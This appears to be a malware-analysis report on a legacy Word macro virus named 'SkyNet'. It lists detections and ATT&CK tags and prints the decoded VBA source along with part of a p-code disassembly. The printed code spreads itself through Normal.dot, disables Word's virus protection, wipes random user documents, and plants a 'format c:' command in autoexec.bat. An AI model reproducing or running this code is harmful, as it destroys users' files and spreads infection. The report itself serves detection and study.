MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, specifically AutoOpen, AutoClose, and AutoExec, which are triggered automatically. The AutoExec macro attempts to write commands to C:\autoexec.bat, including 'echo s | format c:/q/V:SkyNet >nul', indicating an intent to format the C drive. The presence of legacy WordBasic markers and the specific macro names suggest a potentially older, but still dangerous, macro-based attack.
Heuristics 5
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9141 bytes |
SHA-256: b094b5eae9b30bfd9af957c6501d90d3072fd0ad1a7f1efb931294b0a38fc56d |
|||
|
Detection
ClamAV:
Doc.Trojan.Skin-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SkyNet"
Sub ViewVBcode()
a = MsgBox("No se pudo encontrar o iniciar Microsoft Visual Basic.", vbExclamation)
End Sub
Sub HerramMacro()
a = MsgBox("No se pudo encontrar o iniciar Visor de Macros.", vbExclamation)
End Sub
Sub Accion()
On Error Resume Next
If Year(Date) > 1999 Or Month(Date) > 10 Then
If Hour(Time) > 19 Then
Application.FileSearch.SearchSubFolders = True
Application.FileSearch.LookIn = Application.Options.DefaultFilePath(wdDocumentsPath)
Application.FileSearch.FileType = msoFileTypeWordDocuments
a = Application.FileSearch.Execute(msoSortByFileName, msoSortOrderAscending, True)
t = Int(Rnd * a) + 1
f$ = Application.FileSearch.FoundFiles(t)
SetAttr f$, vbNormal
Open f$ For Output As #1: Close #1
Kill f$
End If
End If
If Year(Date) > 1999 Then
If Day(Date) = 18 Then
If Hour(Time) > 19 Then
f$ = "C:\autoexec.bat"
SetAttr f$, vbNormal
Open f$ For Output As #1
Print #1, "PATH=C:\DOS;C:\WINDOWS\COMMAND;C:\WIN95\COMMAND;C:\WIN98\COMMAND\"
Print #1, "echo s | format c:/q/V:SkyNet >nul"
Close #1
End If
End If
End If
End Sub
Sub AutoClose()
On Error Resume Next
Call SkyNet
End Sub
Sub AutoOpen()
On Error Resume Next
Call SkyNet
End Sub
Sub AutoExec()
On Error Resume Next
Call Accion
End Sub
Sub SkyNet()
Attribute SkyNet.VB_Description = "Macro creada el 18/09/99 por DesMan"
Attribute SkyNet.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.SkyNet"
On Error Resume Next
Dim InfD As Boolean
Dim InfT As Boolean
Dim I
'CommandBars("tools").Controls("Macro").Delete
'CommandBars("tools").Controls("Plantillas y complementos...").Delete
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
ActiveDocument.ReadOnlyRecommended = False
InfD = False: InfT = False
For I = 1 To ActiveDocument.VBProject.vBComponents.Count
If ActiveDocument.VBProject.vBComponents(I).Name = "SkyNet" Then InfD = True
Next
For I = 1 To NormalTemplate.VBProject.vBComponents.Count
If NormalTemplate.VBProject.vBComponents(I).Name = "SkyNet" Then InfT = True
Next
If InfD = False Then
WordBasic.MacroCopy "Normal:SkyNet", WordBasic.[FileName$]() + ":SkyNet"
If NormalTemplate.Saved = False Then NormalTemplate.Save
NormalTemplate.Saved = True
End If
If InfT = False Then
WordBasic.MacroCopy WordBasic.[FileName$]() + ":SkyNet", "Normal:SkyNet"
If ActiveDocument.Saved = False Then ActiveDocument.Save
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/d6fab5ec15484c22ba2603cff6ce82a8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/SkyNet - 8510 bytes
' Line #0:
' Line #1:
' FuncDefn (Sub ViewVBcode())
' Line #2:
' LitStr 0x0036 "No se pudo encontrar o iniciar Microsoft Visual Basic."
' Ld vbExclamation
' ArgsLd MsgBox 0x0002
' St a
' Line #3:
' EndSub
' Line #4:
' FuncDefn (Sub HerramMacro())
' Line #5:
' LitStr 0x002F "No se pudo encontrar o iniciar Visor de Macros."
' Ld vbExclamation
' ArgsLd MsgBox 0x0002
' St a
' Line #6:
' EndSub
' Line #7:
' FuncDefn (Sub Accion())
' Line #8:
' OnError (Resume Next)
' Line #9:
' Ld Date
' ArgsLd Year 0x0001
' LitDI2 0x07CF
' Gt
' Ld Date
' ArgsLd Month 0x0001
' LitDI2 0x000A
' Gt
' Or
' IfBlock
' Line #10:
' Ld Time
' ArgsLd Hour 0x0001
' LitDI2 0x0013
' Gt
' IfBlock
' Line #11:
' LitVarSpecial (True)
' Ld Application
' MemLd FileSearch
' MemSt SearchSubFolders
' Line #12:
' Ld wdDocumentsPath
' Ld Application
' MemLd Options
' ArgsMemLd DefaultFilePath 0x0001
' Ld Application
' MemLd FileSearch
' MemSt Loo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.